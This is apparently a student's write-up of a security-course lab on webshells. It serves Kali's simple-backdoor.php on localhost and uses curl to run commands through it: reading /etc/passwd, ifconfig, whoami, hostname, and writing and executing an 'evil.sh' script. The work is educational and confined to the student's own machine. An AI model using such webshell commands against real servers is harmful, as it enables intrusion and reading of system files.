Assignment 7.1 Webshells

This lab is the precursor to Lab 7.1 Exploiting Pippin. When exploiting pippin, you likely made use of a webshell to get access to /etc/passwd on the target. In this Assignment, you are going to dive a little deeper into how this actually works.

Preparation

  • Create a directory called webshell on kali

  • create a file called index.html

  • copy /usr/share/webshells/php/simple-backdoor.php to the Webshell directory

PHP Web Server

We can invoke a simple web server with PHP. Here's the syntax. If you are using a high port (>1024) you don't need to be root. Let's do that instead of having a root invoked webshell on our box.

Make sure you are listening on 127.0.0.1 and not 0.0.0.0 or your actual IP address. By listening on 127.0.0.1, we are not exposing our webshell to remote parties.

php -S 127.0.0.1:8090 -t.
Running our own web server

Examine the webshell

Below are the contents of the php webshell that we copied to our Webshell directory

We will be using the http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd command to query our webserver that we started above for information.

Deliverable 1: Provide a screenshot of your own /etc/passwd

Make sure you have two different terminal windows open, one for your web server and one for the commands you will be running against it.

If you need to restart the web server DONT CLOSE THE TAB. This will not shut down the process, it will still run in the background and then you will have to figure out how to kill all PHP processes in the system. Just press ctrl+C and wait until it ends the proccess.

Enter the command below to dump the /etc/passwd file! 

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=cat+/etc/passwd
Dump of /etc/passwd

Below is the php webserver logging a successful GET request of the /etc/passwd dump:

web server logging the /etc/password

Deliverable 2. Continuing your use of curl or your webbrowser and webshell, get/do the following:

IP Address information 

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=ifconfig
running ifconfig command

Current User

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=whoami
whoami

Hostname 

curl http://127.0.0.1:8090/simple-backdoor.php?cmd=hostname
hostname

Try using your webshell and echo to create a script.sh file that has an arbitrary command in it.

Before I made the script, I wanted to figure out the correct syntax for making a normal text file.

curl "http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+hello+>+hello.txt"

When dealing with URL's it is best practice to put what you are typing in quotations after the curl command, so that the system won't read the speical characters you are using to execute command as URL encoding.

Example of making a file in the server "hello.txt"

Here is the creation of the actual script in my php web server: 

curl "http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+whoami+>+evil.sh"

//the command below runs the script with the command whoami
curl "http://127.0.0.1:8090/simple-backdoor.php?cmd=bash+evil.sh
making a bash script called evil.sh and excuted it with the bash command

PreviousModule 7: Expoliting Pippin - File Upload Vulnerabilities, WebShells and DatabaseNextLab 7.1 - Exploiting Pippin

Last updated